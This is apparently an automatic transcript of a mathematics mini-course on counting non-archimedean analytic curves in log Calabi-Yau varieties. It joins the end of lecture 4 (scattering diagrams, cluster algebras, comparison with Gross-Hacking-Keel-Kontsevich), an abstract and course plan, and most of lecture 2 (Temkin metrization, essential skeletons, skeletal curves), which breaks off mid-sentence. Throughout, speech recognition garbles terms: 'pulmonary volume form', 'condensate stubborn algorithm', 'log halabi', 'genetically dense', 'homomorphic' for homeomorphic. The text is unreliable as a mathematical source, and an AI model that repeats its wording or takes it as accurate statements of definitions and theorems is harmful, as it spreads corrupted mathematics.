fraction field of r hat they become automorphisms of l hat so we no longer need to take a fraction field of l hat because when we forget the curve classes the wall crossing transformations will automatically become invertible and furthermore the local theta functions in r hat they map to the quotient theta functions in l hat so we have this j attic convergence for all these things before and moreover we get the invertibility of the wall crossing transformation so now we denote du to be the set of pairs x fx bar where x is any generic point in any hyperplane and probe and the fx bar is the associated wall crossing function ignoring all curve classes and we call this the scattering diagram associated to u with respect to the torres tm now we have the following consistency result which says that the scattering diagram du is consistent in the sense of contrived sobo man in other words for any general loop inside the mr the composition of wall crossing automorphisms after ignoring curve classes along the loop is just identity so for the proof we observe that the subring of l hat generated by all local theta functions is genetically dense and then the theorem follows from the theta function consistency so that's the general constructions of the scattering diagram using counts of infinitesimal analytic cylinders and now let us apply our constructions above to the case of cluster algebra now here is the cluster data we have lattice m with an integer valued skew symmetric form and we have s prime a basis of m and s inside s prime a subset of s prime this gives a seed for a skew symmetric cluster algebra of geometric type where s corresponds to unfrozen variables and the s prime minus s corresponds to frozen variables and the seed gives rise to curly a a fork contour of a type cluster variety which is the gluing of torri via cluster mutations and we let a up b the algebra of global functions on a called the upper cluster algebra let us assume that the skew symmetric form is unimodular we assume this for mainly for con partially for convenience this holds in the principal coefficient case because this holds in the principal coefficient case and then we will deduce more general cases from the principal coefficient case and we also assume that the spec of the upper cluster algebra which we denote by u is a smooth case so for example double brouha cells in semi-simple complex complex three groups satisfy this smoothness assumption I think it's possible to extend our work also to cover the non-smooth case without too much extra effort but I haven't checked all the details then u is a log halabi all containing a torus dm so we can apply our theory to u and obtain a mirror algebra as well as a canonical scattering diagram by counting non-archimede and elliptic curves and here is the question how shall we compare with the constructions in the paper of gross hacking keel condos habits the idea is the following in ghkk the mirror algebra is built from the scattering diagram and the scattering diagram is built by specifying the initial walls and using the condos habits soba man algorithm therefore for comparison with ghkk by the uniqueness property of the condos soba man algorithm it suffices to compare the set of incoming walls however we have defined walls simply as images of tweaks of tropical curves and we do not have a notion of incoming or outgoing walls in this generality therefore here in the cluster case we need to introduce a more restrictive notion of tweaks and walls which will allow us to distinguish incoming versus outgoing walls and to better control the monomials in the scattering functions we will call them c-tweaks and c-walls where c stands for cluster so a c-tweak is a tweak such that each infinite leg maps to a hyperplane e-prop with derivative sum multiple of e for sum e in this basis corresponding to unfrozen variables it's easy to see that for all stable map in the modular space m smooth that we are interested in the tweaks of the tropical curve associated to such stable map they are all c-tweaks in the cluster case and the next we define a c-wall to be a pair sigma n where n lies in p the sub monoid of m generated by s and the sigma in the hyperplane m-prop is a closed convex rational polyhedral cone a c-wall is called incoming if n lies in sigma and is called outgoing otherwise so c-wall has a little bit more refined information of this direction vector n and now we can construct a collection of c-walls by induction so we start with w0 the collection of c-walls of form e-prop n where e is any basis vector corresponding to unfrozen variable and n is any positive multiple of e we call these the initial c-walls and then by induction we define assume we already have w0 until wt and we define wt plus 1 as follows for all pairs for two c-walls all pairs of c-walls in wt such that either the pairing of the two direction vectors is nonzero or the direction vectors are parallel we define the sum of the c-walls of the two c-walls like this where the support of the wall is sigma 1 intersects sigma 2 minus all positive multiples of n1 plus n2 and the direction of the c-wall is just n1 plus m2 we check that it is a c-wall and we add all such sums to wt and finally we let w be the union of all wt so here it's important that we do not add walls when the two direction vectors as pairing zero but they are non-parallel because this corresponds to a non-transverse situation so two consequences of the construction are the following first the incoming c-walls of w are exactly the initial c-walls and the second for any generic c-tweak and any edge there is always some c-wall in our collection w such that the image of the edge lies in the support of the c-wall and the derivative is equal to the direction of the c-wall and we remark that for the scattering diagram associated to you the second consequence implies that the wall crossing function always has the form has this form where the exponent is just the multiples of this n whose prep contains x so a priori the exponents can be quite arbitrary but from the notions of c-tweaks and the c-walls we see that we have a strong restriction on the shape of the scattering functions now we are ready to deduce the comparison with ghkk so let the dghkk be the scattering diagram in ghkk it is produced by the condensate stubborn algorithm from the set of initial walls e-prop with scattering function one plus z to the e for all e for all basis vector e corresponding to the unfrozen variables therefore by the uniqueness property of the condensate stubborn algorithm and by the identification of incoming c-walls in our setting just above it remains to show that our c-walls have the same wall crossing functions and in other words it's enough to show the following claim that for each e in s and for any point x in e-prop generic the attached scattering function for getting curve classes is just one plus z to the e and that can be done by first figuring out what do the tweaks look like and then by an explicit computation so from this we deduce immediately the comparison theorem for the scattering diagrams between our scattering diagram and the ghkk scattering diagram and then we have the comparison theorem in the both a cluster case and also the x cluster case so let us recall that in the first lecture I mentioned the five consequences of the comparison theorem and roughly the comparison theorem gives geometric interpretations of and also more conceptual understandings of many constructions in ghkk and also proves some of their conjectures since I don't have much time for in the first lecture I mentioned another application of our theory to the study of for modular spaces of calabiol pairs so probably I can explain it in some other occasions thank you very much for your attention okay thank you thank you rush we're lectures and maybe some people want to ask some questions just please just unmute yourself and ask questions yeah yeah no for me the last part was very familiar so it's too easy yeah maybe the general questions in the situation we don't have nice assumptions about a fineness when we don't have a fineness with the mirror algebra is not an algebra yeah it's just formal but still yeah it's still for it's still algebra some form post-heurism yes yes so probably you want it to be some affinoid algebra yeah yeah yeah without a fineness but in any case we need some positivity assumption yeah because as we have seen in the proof of the deformation invariance we want to prevent bubbles moving from the interior to the boundary yeah because if so we want to count analytic disks in in the log calabiol variety u we want we don't want to count analytic disks that has something to do with the boundary yeah and if we don't have any a fineness or other sort of positivity assumption then we cannot count analytic disks in u because it can have bubbles or it can deform and touch the boundary so i guess in order to be able to count analytic disks we need at least that the log calabiol to be proper over some affine yeah you need some kind of semi-positivity of the boundary yeah it's yeah it's actually very proper over affine yeah proper affine it's sufficient here but maybe it's but the proper over affine is equivalent to the condition that we have some positive we have some positive combination of boundary components which is nev but they feel good conditions if they both both conditions they are equivalent and i think it's yeah also such kind of variety appears in jt theory usually jt you produce i think that's a satisfactory setting yeah to assume proper over affine it also projective projective or fine yeah and it also covers just the projective case over a point okay so there's no more questions then we can thank you for the nice series of lectures and thank you Maxine and thank you everyone for your attentions
|
4/4 - Scattering diagram, comparison with Gross-Hacking-Keel-Kontsevich, applications to cluster algebras, applications to moduli spaces of Calabi-Yau pairs. --- We show that the naive counts of rational curves in an affine log Calabi-Yau variety U, containing an open algebraic torus, determine in a surprisingly simple way, a family of log Calabi-Yau varieties, as the spectrum of a commutative associative algebra equipped with a multilinear form. This is directly inspired by a very similar conjecture of Gross-Hacking-Keel in mirror symmetry, known as the Frobenius structure conjecture. Although the statement involves only elementary algebraic geometry, our proof employs Berkovich non-archimedean analytic methods. We construct the structure constants of the algebra via counting non-archimedean analytic disks in the analytification of U. We establish various properties of the counting, notably deformation invariance, symmetry, gluing formula and convexity. In the special case when U is a Fock-Goncharov skew-symmetric X-cluster variety, we prove that our algebra generalizes, and in particular gives a direct geometric construction of, the mirror algebra of Gross-Hacking-Keel-Kontsevich. The comparison is proved via a canonical scattering diagram defined by counting infinitesimal non-archimedean analytic cylinders, without using the Kontsevich-Soibelman algorithm. Several combinatorial conjectures of GHKK follow readily from the geometric description. This is joint work with S. Keel; the reference is arXiv:1908.09861. If time permits, I will mention another application of our theory to the study of the moduli space of polarized Calabi-Yau pairs, in a work in progress with P. Hacking and S. Keel. Here is a plan for each session of the mini-course: 1) Motivation and ideas from mirror symmetry, main results. 2) Skeletal curves: a key notion in the theory. 3) Naive counts, tail conditions and deformation invariance. 4) Scattering diagram, comparison with Gross-Hacking-Keel-Kontsevich, applications to cluster algebras, applications to moduli spaces of Calabi-Yau pairs.
|
10.5446/51039 (DOI)
|
Thank you very much for coming to the second lecture of this mini-course. Here is the plan for today. First, I'll explain the theory of Tamkin's metrization and the Kondasevich-Sobomar essential skeleton. Second, I'll introduce skeletal curves, which is a key notion in the theory. Third, I'll explain where do skeletal curves come from in practice, natural sources of skeletal curves. And fourth, I will introduce naive counts of skeletal curves. And finally, I will give a proof of the symmetry theorem by skeletal curves as an application of the theory of skeletal curves. We will see other applications of skeletal curves in the next lectures. Okay, so let's start with the first part, Tamkin's metrization and the Kondasevich-Sobomar essential skeleton. The idea is the following. By a coverage, non-archimedian analytic spaces have very complicated underlying topological spaces. For example, the analytic p1 is an infinite tree containing infinitely many vertices and infinitely many branches. And the by a coverage analytic elliptic curve is infinitely many trees attached to a circle. It is impossible to visualize by a coverage analytic spaces in higher dimensions. But they contain very nice piecewise linear subsets called skeletons. In general, skeletons are not unique. They depend on the choice of formal models. But if we are given a volume from omega on the analytic space, then we can define a unique skeleton, a scale of omega associated to the volume from omega. Thus, for Kalabiya variety, where we have a unique volume form up to scaling, we have a canonical skeleton called the essential skeleton. For example, the circle inside this elliptic curve is the essential skeleton of the elliptic curve. Here is the history of essential skeleton. In 2000, Kondasevich and Sobomar constructed an essential skeleton inside the non-archimedian analytic Kalabiya space X over C double parenthesis T of maximum degeneration. Here, C double parenthesis T denotes the field of formal Laurent series. Their method is the following. First, they define a weight function psi on divisorial points, X div inside X using semi-stable models of X. And then they define the essential skeleton, SK of X inside X to be the closure of the minimum locus of psi. After that, in year 2012, Moustata and Nygeth extended the weight function psi to the whole analytic space. So it is no longer necessary to take a closure for defining the essential skeleton. Then in 2017 and 2018, Brown-Mason and Mori-Mason-Stevensson, they extended the weight function and the essential skeleton to pairs. And in 2014, not really in chronological order, Michael Tampkin made a vast generalization. He bypasses completely the use of semi-stable models. In this way, he is able to extend the theory of weight function and essential skeleton to any non-archimedian base field, not necessarily of characteristic zero or discrete valuation. And moreover, his theory works in the relative situation for any analytic space X over another analytic space S. His method is the following. First, he provides the shift of scalar differential on X, omega X, with the maximum seminorm called scalar seminorm, which is the maximum seminorm making the differential D from the shift of functions on X to the shift of differentials on X, a non-expensive map. He calls this maximum seminorm, scalar seminorm. Then this gives rise to a seminorm on the canonical bundle KX by taking top exterior power of the shift of scalar differential. Now, if we have a volume from omega, and if we apply this seminorm to omega, we obtain a real-valued function. And the TAMKIN proved that this real-valued function is equal up to a constant to the Kondasevich-Sobomar-Mustataniykes weight function in the situations where the weight functions are well defined. And the essential skeleton in TAMKIN's language is just the maximum locus of this scalar seminorm of this volume from omega. This is roughly his method, and since we will need the TAMKIN's formulation to establish some properties of essential skeletons for some of our proofs, here let me give more details of TAMKIN's construction. So first, let us define some seminorm at the level of rings. Definition, given a seminorm of the ring B and a homomorphism of rings, phi from A to B will equip omega B over A, the module of relative scalar differential with the scalar seminorm, by the following formula. For any element X in this module of relative scalar differential, we define its scalar seminorm to be follows. First, we write X as sum of CIDBI, where CINBI lie in B, CINBI are elements of B, and we take the maximum over I of the norm of CI times the norm of BI. And then we take inf of this maximum over all possible ways of writing X as sum of CIDBI. So this gives the definition of scalar seminorm at the level of rings. And the TAMKIN proves that gives a canonical characterization of this scalar seminorm defined by the explicit formula. He proved that this scalar seminorm is the maximum seminorm that makes the differential D from B to the module of relative scalar differentials a non-expensive a homomorphism. Now let's consider the global geometric situation. Given F a morphism of K analytic spaces, where K is any non-archimidium base field, we apply this above definition at the level of rings, we obtain immediately a pre-sheaf of scalar seminorms of avinoid domains. Then via sheafification, we obtain so-called scalar seminorm on this sheaf of relative scalar differentials. And similarly, we have a canonical characterization as in the lemma above. TAMKIN shows that this norm defined from sheafification is simply the maximum seminorm on this sheaf of relative scalar differentials, making the map D from the sheaf of functions to the sheaf of differentials a non-expensive map. And now if we take top exterior power and arbitrary tensor product, we obtain the scalar seminorm on pulmonary volume forms. And there is a small technical point is that in fact, we have to consider so-called geometric scalar seminorm after passing to algebraic closure in order to get better properties. Here is a theorem of TAMKIN. For any pulmonary volume form, omega, we can take its scalar seminorm and we obtain a real-valued function on X. TAMKIN's theorem says that this scalar seminorm of omega is an upper semi-continuous function. The theorem says that this real-valued function, the scalar seminorm of omega is an upper semi-continuous function. Now we make the following definition. We define the skeleton of X associated to any pulmonary volume form omega to be simply the maximum locus of the scalar seminorm of omega. It's possibly empty if the maximum doesn't exist. And we denote this skeleton associated to omega by S k of omega, considered as a subset of X. So this definition of skeleton depends on the choice of some pulmonary volume form. And now let's introduce the definition of essential skeleton, which is just a union of all such skeletons over all possible volume form. Here it is. Definition essential skeleton. Let K be a noray-chimedian field of characteristic zero and let X be any smooth K-variety. We define the essential skeleton of X, denoted as S k of X, to be simply the union of skeletons associated to all omega, where over all log-pulmonary volume form omega. And by definition, a log-pulmonary volume form is just a section of this line bundle, which is some arbitrary tensor product of the logarithmic canonical bundle. And here we take any SNC compactification, X in Y, and so Y is any SNC compactification of X, and D is the complement of X. And one can show that this space of sections is independent of the SNC compactification we choose. So we can just choose any SNC compactification, consider all pulmonary volume forms as sections of any tensor parts of the logarithmic canonical bundle, take the associated skeleton, and then take union, and this is by definition the essential skeleton of X. Since we have taken union over all volume forms, it's just canonically associated to X. Let's introduce a notation for later use. When a compactification X in Y is fixed, it's usually quite natural to consider the closure of the essential skeleton of X inside the identification of Y. And we denote this closure by SK bar X, and sometimes we call it the closed essential skeleton. So that makes sense if we have a compactification fixed. Let's give some examples of essential skeletons. First example, we take X to be the algebraic torus. In this case, the essential skeleton of X is homomorphic to Rn, and it lives in the identification of the algebraic torus. One can show that the essential skeleton of X is in fact a birational invariant with respect to volume forms, of course. So if U is a log-Kalabiya variety containing a Zariski open torus, Tm, m being the co-character lattice, as in the previous talk, then the essential skeleton of U is just equal to the essential skeleton of the torus, and it's homomorphic to mR. The lattice m tensed with R. So it's just Rn. So for our log-Kalabiya, the essential skeleton is very simple, just Euclidean space. Second example, we take X to be P1 minus some closed points. In this case, the essential skeleton of X is equal to the convex hull of these points. So recall that the analytic P1 is an infinite tree with infinitely many vertices and infinitely many branches. And we take out some closed points from this tree. The closed points, they are points on the boundary of this disk. Then the claim is that the essential skeleton of the punctured P1 is equal to the convex hull of these points. So here we take out four points, four closed points, and then the essential skeleton is the convex hull of these four points, which is this red sub-tree inside this infinite tree. Example three, we take X to be an elliptic curve with bad reduction, whose identification is infinitely many trees attached to a circle. In this case, the essential skeleton is just the circle inside this analytic space. Then we have a two-dimensional add log of this example three, where we take X to be a k-3 surface with maximal degeneration. And in this case, the essential skeleton is homomorphic to S2, two-dimensional sphere inside the n-nification of X. The final example we want to give is the following. We take X to be m0n, the modular space of P1 with n marked points. Then we show that the essential skeleton of X is homomorphic to chop 0n, the modular space of rational tropical curves with n legs. So we show this by considering the classical D'Hille-Mainford compactification, m0n bar of X, consisting of stable n-pointed rational curves. And then we show that it gives rise to a minimal compactification, and we further deduce that the essential skeleton is just the usual skeleton associated to the compactification. And that skeleton was previously studied in the work of Abramovich, Caporoso and Paine. So that's for the moment, that's what I want to explain for the theory of Tamkin's matrization and essential skeleton. Now let's turn to the next section. We will introduce the notion of skeletal curves, which is a key notion in the theory. The idea is the following. Let's consider an analytic curve C in the log-calabi-albarite U-analytic. We have our log-calabi-albarite U-analytic, and the notification of our log-calabi-albarite, and inside we have this blue essential skeleton, piecewise linear subset embedded in this analytic space, this blue essential skeleton. And we consider some analytic, this red analytic curve C inside our calabi-al. If the dimension of U is greater or equal to 2, then by dimensional reason, the curve C never meets the essential skeleton. Because the points in the essential skeleton are valuations on the generic point of the variety U. And the points in the curve C is a one-dimensional subspace. The points of the curve C there at most of dimension one, while the points in this essential skeleton is of top dimension. So this curve C has no chance to meet this essential skeleton, just because of dimension reason. But we can let the curve C touch the essential skeleton, SKU, essential skeleton of U, if we allow the curve C to be defined over a big non-archimedean field extension, K in K prime of K. And here is the surprise. And soon as some K point of the curve C touches the essential skeleton of U, then the whole skeleton of the curve C must lie in the essential skeleton of U. So we observed that in general by dimensional reason, there's no chance for a curve C to touch this green essential skeleton. But if we allow the curve C to be defined over a big enough non-archimedean field extension, then as soon as some K point of C touches this essential skeleton SKU, then the whole skeleton of C will lie in the essential skeleton of U. Now let us give the precise statement. We fix some log-calabi-all variety U, the orange U over K, some volume form omega on U, U in Y, here Y, some SNC compactification, and let D be the divisors at infinity. We denote by D essential inside D, the union of essential divisors. By essential divisor, we mean divisors where the volume form omega has a pole. So here in the picture, these dark blue curves denote essential divisors while this light blue curve is a non-essential divisor. And now we will consider some curve C in Y, this red curve that touches some points of the boundary divisor. So as we said, if we want the curve to touch the skeleton, we must pass to a big enough base field extension. So let K in K prime be a non-archimedean field extension, and we choose C, a rational nodal curve over K. We consider F, a K prime analytic map from the base change of C to the base change of Y, such that the pre-image of F, the pre-image by F of the divisor D, is equal to the pre-image by F of the essential part. In other words, the curve C meets only essential divisors at infinity. And furthermore, we ask that the pre-image of the essential divisors is some linear combination of K points, P i in C, such a curve, which mainly lies in the interior U. And when it hits the boundary divisor, it hits only the essential part at some K rational points with some multiplicities. So F is a K prime analytic map between the base changes, and we consider the composition of F with this natural projection map given from the base change. So we have made a base change, and we have the natural projection of base change, and we consider the composition, which we denote by FY. Now the claim is that if FY of X lies in the essential skeleton of U for some K point X, then FY of the essential skeleton of the base change of the punctured curve, C naught is just C minus the marked points. So then FY of the skeleton of the punctured curve will lie totally in the essential skeleton of U. In other words, the whole skeleton of the curve lies in the essential skeleton of U. And recall from the example that we mentioned above, the essential skeleton of such a punctured curve is just equal to the convex hole of all the marked points in the analytic space. So this is a precise statement, and we call such F skeletal curves. Here is an example of skeletal curve. We take U to be the algebraic torus, and we have seen from the examples above that the essential skeleton of the algebraic torus is just Rn, this blue plane, and we take the essential skeleton homomorphic to Rn, and we take our curve C to be just P1. So it's an infinite tree, and we choose four marked points in P1. The essential skeleton of the punctured curve C naught, C minus the four marked points, is just the convex hole of these four marked points, which is this red sub tree inside this infinite tree. And now we consider a map from this P1 to the algebraic torus. So as we said, in general, this map, the image of this P1 has no chance to meet this blue essential skeleton, just because of dimensional reason. But if we pass to a big enough base field extension, then it might happen. And the theorem says that if some key point of the curve C hits the blue essential skeleton, then the whole skeleton, this red sub tree, the whole skeleton of the curve will lie in the essential skeleton of U. The major advantage of skeletal curves is that they have canonical tropicalization. Since the map fy maps the skeleton of the curve into the essential skeleton of U, we can just restrict this map fy to the essential to the skeleton of the curve, and we get some tropical object from some finite tree, some tree, which we denote by gamma, to this, this polyhedral object. And this restriction is independent of any choice of retraction map from the identification of U to the essential skeleton of U. So in general, for general curve, this image of the skeleton of the curve will does not lie in the essential skeleton of U. Therefore, to get anything tropical, we must further compose with a retraction from the identification of U to the essential skeleton of U. But this retraction is not canonical. For example, different minimal compactification U in y gives different retraction maps. So then for general curve, different retraction maps gives different tropicalizations. But for skeletal curves, the compactification does not matter. We always have a canonical tropicalization. And we call this restriction the spine associated to the skeletal curve. So in the example above, the spine, the associated spine is simply the map from this red sub tree to the blue to the blue plane is red curve. And this is canonical independent of any choice of retraction. Now let me explain the idea of the proof of the skeletal curve here. Let's first recall the statement. We have some narachymedian field extension k prime of k and a rational curve nodal rational curve C over k. And we consider a k prime analytic map of the base change of C to the base change of y such that the curve hits the boundary device meets only essential boundary divisors at some k points. And we can see the composition of F with the projection map of from the base change. The claim is that if f y of x, if f y sends some k point of the curve to the essential skeleton of you. Then f y sends the skeleton of the base change of the punctured curve, which is just C minus all the marked points to the essential skeleton of you. In other words, the whole skeleton of the curve lies in the essential skeleton of you. Here is the idea of the proof. So for the proof, we put the map f above into a family and we consider the skeleton of the family and also the skeleton of the base. We want to relate various skeletons together. In order to put the map into a family, very naturally we consider a home scheme consisting of all maps from the curve to y analytic. We consider the subspace of the home scheme H consisting of all maps f from C to y analytic of the same curve class and the same same intersection pattern with D as the given one. We have the following diagram. So H is some space of maps over H we have the universal curve, which is just a product. Since it's just a space of maps, the domain curve doesn't change. So it's just a product C times H. We have two projections, Pc to C, Ph to H. Then we have the universal map from the universal curve to y, which we denote by E. And we consider also the map phi from the universal curve to C times y, whose first factor is projection to C and the second factor is given by the universal map. By the deformation theory of curves, we can show that the map phi is a tile over some dense, very ski open subset of the target. It's generically a tile. Furthermore, using deformation theory of curves by computing the tangent spaces of H, we show that the volume from omega on U in y, the volume from omega on U gives rise to a volume from omega H on H. So it induces a natural volume from omega H. Then we do an explicit computation. One can see that the pole back of omega, omega is here, the pole back of omega by E and the pole back of omega H, omega H is on H by the projection map Ph. They agree on Ph horizontal tangent spaces of the universal curve. So they may not completely agree, but they agree on horizontal tangent spaces. This implies that for any one form alpha on the punctured curve C, if we pull back alpha by the projection map Pc, and we wedge the pole back of omega by E, this is equal to the pole back of alpha by Pc. And a wedge the pole back of omega H by Ph. It's just because they agree on the horizontal tangent space, the two forms. So if we wedge anything vertical, we get equality. We denote this by equality star. Second, for any k rational point, k point x in C, which is not the marked point PI, we consider the evaluation map at x, e v x, which is a map from this space of maps H to U. And we're just evaluating at x to unalertify. Then since such an x gives a horizontal section, gives a horizontal section of this projection Ph, and we agree from since these two forms agree on on the horizontal tangent spaces. And if we pull back using the horizontal section, we see immediately that the pole back of omega by e v x is equal to is just equal to the volume from omega H. This implies that the pre image of the essential skeleton of U by e v x is equal to the is just equal to the essential scale to the skeleton of H associated to the volume from omega H. And because again, by the deformation theory of curves, we can one can see that the evaluation map e v x is generically a tile. And that implies that pole back of skeleton is equal to skeleton of pole back. So this is pre image of skeleton, but a darkness of e v x pre image of skeleton is just a skeleton, skeleton of pole back. This omega H is pole back. And we denote this equality by double star. Now, let's pick one fiber of our family. So we choose any point F. H is the space of maps, we choose any point F. We denote by CF the fiber of the universal curve at F. So recall that the universal curve is just a product. So the fiber at F is just some base change of C. F H is the space of maps, F is a point in the space of maps. So F gives a map from the fiber CF to Y analytic, which is just the restriction of the universal map. E from the universal curve to from the universal curve to Y analytic. There should be no C here. And it's natural to denote this map F because it's really given by F. Assume now assume that f x lies in the essential skeleton of you for some K rational point X. Since f x is just evaluation of F at X. So this equality double star implies that F lies in the skeleton associated to the volume from omega H. Because we assume f x lies in the skeleton of you and f x is just evaluation of X at F. So by this equality, we know that evaluation, E V X of F lies here means that E V X of F lies in skeleton view means that F lies in the pre image of the skeleton view by E V X, which means that F lies in the skeleton associated to omega H. So we get a very nice characterization of F now just from our hypothesis. And recall our goal is to show that F of the skeleton of the punctured C0 the punctured fiber C0 F lies in the essential skeleton of you. So in order to show that let's compute let's compute this pre image pre image by five of the product of the skeleton of C0 times the skeleton of you. We want to show this we compute this product we will use the map file. And by definition, the skeleton essential skeleton of C0 is just a union of skeletons associated to all possible log volume forms on C0. Here, taking union over log volume forms or plurip log plurip forms they are the same. But first equality is by definition of essential skeleton. Next, using Tamkin's theory of matrization. Tamkin's matrization theory, one can show that skeleton of product is equal to product of skeleton. So here we have product of skeleton, and it's equal to skeleton of product with respect to the wedge of the volume forms. And the next recall that the five is generically a doll by deformation theory. This implies that pullback of skeleton is equal to skeleton of pullback. So here we have pre image of skeleton by some a doll map. And this is equal to skeleton of the pullback of the form. By this map. Now recall. By definition, five has two factors. First factor is projection to see second factor is the universal map. And by definition of E, so by definition of five, by definition of five, this is just equal to the skeleton of pullback of alpha by PC wedge pullback of omega by E. Now we apply our explicit computation, this equality of forms on horizontal vector spaces, we apply our explicit computation, we deduce that this is equal to skeleton of this wedge product. So we replace this wedge, this pullback of omega by E by this pullback of omega H by pH. And then to summarize this. This by definition again is just the essential skeleton of C not of the punctured curve times the essential skeleton of omega H. And we observe that by Tamkin's matrization theory, a point to see lies in the essential in the skeleton of a product x times y, if and only if the project to appoint why mean the skeleton of why of big why and the Z lies in the skeleton of the fiber. So a point lies in skeleton of product if and only if it projects to skeleton of the base and the mobile at the last in skeleton of the fiber. Since F lies in the skeleton associated to the form omega H, so we think H as the base here. Therefore, for any x in the skeleton of the fiber, the skeleton of the fiber, the punctured curve at F. This computation, the equality above between this, this one and this one shows that X just lives in the pre image of the product of skeleton. Because by what we just said, F already lives. So we look at this line F already lives in the skeleton of the base. Now, if we choose any point in the skeleton of the fiber, then this point actually lies in the skeleton of of this total space. And that is just equal to the pre image of this product of skeleton. This shows that X lies in the pre image by five of this product of skeleton. And we deduce that just to record the definition of five we deduce that F of the skeleton of the punctured curve at F lies in the essential skeleton of you. In other words, the skeleton of the curve maps to the essential skeleton to the essential skeleton of you. So proof complete. Remark, by adding extra K points to our curve C as marked points, the above argument has a stronger and perhaps more surprising result. We can show that the convex hall of all K rational points inside the fiber CF maps to the closed the skeleton SKU, the closed essential skeleton, which is just the closure of the essential skeleton in this fixed compactification. So not only the skeleton of the curve maps to the skeleton of the target, but the convex hall of all K points will lie there. So this that is all I want to say for the proof of the skeletal curve theorem. And if you did not follow every line of the proof, no worries. And now we will move to the next topic. So the question is, the skeletal curves seem so nice. They have they have canonical tropicalization and we will be using them for many purposes. So the natural question is, where do they come from in practice. And in the next section, we will talk about the natural sources of skeletal curves. Let's first make five minutes break before moving on to the next section. So the skeletal curves, they seem so nice, but where do they come from in practice. And that's what I will explain in the next part of this lecture. So let's explain where do skeletal curves come from. And we recall from the Frobenius structure conjecture that we are interested in counting rational curves in Y with prescribed intersections with the boundary D. So we have Y, some SNC compactification of our log alabi or U, and we are interested in counting this kind of red curves whose intersection with numbers, whose intersection numbers with the boundary divisors are fixed. Or if we can also phrase it in terms of the interior, in other words, we are interested in puncture the rational curves in U with prescribed asymptotics at the punctures. Anyway, U is what we ultimately care about. So let's fix some notations for convenience. We have a tuple, both P consisting of PJ, where PJ are integer points in the skeleton. So in my last lecture, I give an explicit formula for this SKUZ, which is just zero disjoint union with positive integer multiples of essential divisorial valuation. And now, in this lecture, I explained the theory of essential skeleton, and they are just the integer points inside the essential skeleton. So we fix this tuple in order to prescribe intersections of our red curve with the boundary D. Some PJ can be zero, and we call such J internal marked points. For example, we can have an internal marked point P4, internal because they maps to the interior. And for nonzero PJ, we call such J boundary because these marked points are supposed to go to the boundary, and we write PJ as in this explicit form, multiples of some divisorial valuation, and then we write PJ times nu J, and the divisorial valuation is just some divisor at infinity. So we can always assume that nu J is given by some component of our boundary D after making some blow up. Now let's consider the modular space, the modular stack Mu, both P beta, consisting of n pointed rational stable maps from some nodal rational curve, C with marked points PJ to Y of class beta, such that each boundary marked point PJ meets the interior of the divisor, dJ, with tangency order mJ, and no other intersections with D. So, exactly the sort of modular stack we consider in the Frobenius structure conjecture. And if we pick an internal marked point Pi, then we can evaluate at this internal marked point, and we obtain something in U. And we can also take the domain and take the stabilization of domain, we obtain a point in the Dlingman for the stack of n pointed rational curves. So recall that the domain of a stable map may not be stable. Thus, we need to take a further stabilization in order to get a stable curve. And we put them together, we have the natural map of Pi. Very analogous to the map Pi, we consider that in the proof of the skeletal curve theorem. And now we have the theorem source of skeletal curves, which says that Pi i over the skeleton inside the target has finite fibers. And moreover, the fibers, they consist of skeletal curves, which just means that the pre-image of Pi i by Pi i of this skeleton inside the product consists of skeletal curves. So that's the way we produce skeletal curves in practice. And just a small point here, we consider closure of the skeleton. So it's a bit stronger than we just consider skeleton. And that is important in the theory, because we also want to consider degenerate domains. And in the proof of associativity, for example, it's, and also just in the classical theory of Goromov-Wittern invariance, it's useful sometimes to degenerate stable maps and to break them apart. So that's why we also consider the closure of skeleton, which will contain these degenerate curves. So that's the way we produce skeletal curves in practice. And the proof is the following. For finiteness, we again use the deformation theory. We can show that for any fixed modulus of domain, the fiber of Pi i at mu is finite at a tau over some zyrowski dense open subset of the log-calabi yaw. And skeletalness follows from the skeletal curve theory. So here, finiteness allows us to count curves naively without using virtual fundamental classes. And let me explain now how do we count them naively using this finiteness result. So let me explain now naive counts of skeletal curves. The above theorem source of skeletal curves suggests a simple definition of naive counts associated to spines in the essential skeleton of yaw, which we explain now. And the study of properties of such counts is the main technical foundation of our theory. So recall we have our natural map of Pi i going from the modulus space of stable maps to the modulus space of stable curves by taking domain modulus and to our log-calabi yaw by taking evaluation of some internal points from the log-calabi yaw. We have a canonically defined spine, which is just we take restriction of f to the skeleton of our curve and this maps to the skeleton of yaw by the skeletal curve theorem. So here, we take the closure of the skeleton, it doesn't change much, just more convenient to work with, because otherwise it's just infinite curves in like in Rn. If we take closure, it's just more convenient for notation, we can see where infinite point goes. So that's a very minor point. Conversely, given any abstract spine h from some graph, some tree to the skeleton of yaw and some curve class beta, we want to count all skeletal curves of class beta giving rise to this spine h. So this is our goal now, we want to define the count n h beta, which is supposed to be the number of skeletal curves with spine h and the curve class beta. So first question, what is an abstract spine in the essential skeleton of yaw? First, observe that the essential skeleton of yaw has an intrinsic conical piecewise integral linear structure. The idea is the following. So if we take any SNC compactification of yaw, we obtain a simple con complex structure on the essential skeleton. And now, such structures given by two different SNC compactifications, they are just related by some piecewise integral linear map. So therefore, this essential skeleton has some intrinsic piecewise integral linear structure. And thus, it makes sense to define a spine in the essential skeleton to be a piecewise integral affine map h from some nodal metric tree to the essential skeleton. Here is a picture. So now we consider such nodal metric tree gamma. This is our essential skeleton and we consider a spine inside. And we denote by vj, the set of one valent vertices of gamma. Let us first consider the case of extended spine. In other words, let's assume that all the vj's are infinite vertices. And we denote by pj the weight of vectors at every vj. In other words, just the derivatives. So these purple vectors are pj. And we denote the whole, all the pj, we put them as a tuple, both p. Here we have five one valent vertices, v1, v2, v3, v4, v5. And v5 shoots up vertically, which means that the leg v5 is mapped to a point. The map h can be constant on the whole leg. And in this case, this p5 is zero, the derivative. So recall that we said that the essential skeleton of m0n is homomorphic to the modular space of tropical curves, with n legs. And in fact, this holds also after taking closure. So the closed essential skeleton of m0n is actually a homomorphic to the modular space of stable extended nodal rational tropical curves with n legs. That's gamma. Sorry. Yeah. Oh, I have a question on this. So the the trough bar is just a naive closure of the tropicalization. A trough bar is a compactification of the modular space of tropical curves. So you're all internal legs of infinite lengths. The legs, they, yes, I allow some edges to have infinite. Yeah. Because I don't know, like the, I think the Jonathan wise and the melody Chen, they have, they define the, the trough bar, like, which is, yeah, I don't know, is it, is it this coinciding with Jonathan wise and melody Chen's definition of the trough bar. So this is a trough bar zero zero and I think it was the first considered in the paper by Abramovich, Caproso and the pain. Okay. So this is called the tropicalization of modular space of stable curves, probably, and, and with Sean, we show that here the essential skeleton is just the essential is just the skeleton given by the classical Dlingman for the compactification. And then we apply a result in the paper of Abramovich, Caproso and the pain, which identifies the skeleton associated 